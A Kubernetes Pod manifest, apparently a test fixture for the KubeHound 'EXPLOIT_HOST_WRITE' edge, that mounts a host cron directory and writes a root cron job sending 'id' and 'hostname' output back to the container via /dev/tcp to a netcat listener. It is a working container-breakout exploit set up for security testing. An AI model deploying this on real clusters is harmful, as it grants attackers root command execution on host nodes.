# EXPLOIT_HOST_WRITE edge
apiVersion: v1
kind: Pod
metadata:
  name: host-write-exploit-pod
  namespace: default
  labels:
    app: kubehound-edge-test
spec:
  containers:
    - name:  host-write-exploit-pod
      image: ubuntu
      volumeMounts:
      - mountPath: /host/
        name: hostroot
      command: ["/bin/sh", "-c"]
      args:
      - |
        CONTAINER_ADDRESS=$(ifconfig eth0  | grep inet | cut -d: -f2 | awk '{ print $2}')
        echo -n "* * * * * root /bin/bash -c '/bin/bash -c echo \"\"; echo \"hello from host! " > /host/etc/cron.d/breakout
        echo -n "$" >> /host/etc/cron.d/breakout
        echo -n "(hostname) " >> /host/etc/cron.d/breakout
        echo -n "$" >> /host/etc/cron.d/breakout
        echo "(id)\" >& /dev/tcp/${CONTAINER_ADDRESS}/1337 0>&1'" >> /host/etc/cron.d/breakout
        netcat -l -p 1337 2>&1
        sleep infinity

  volumes:
    - name: hostroot
      hostPath:
        path: /etc/cron.d
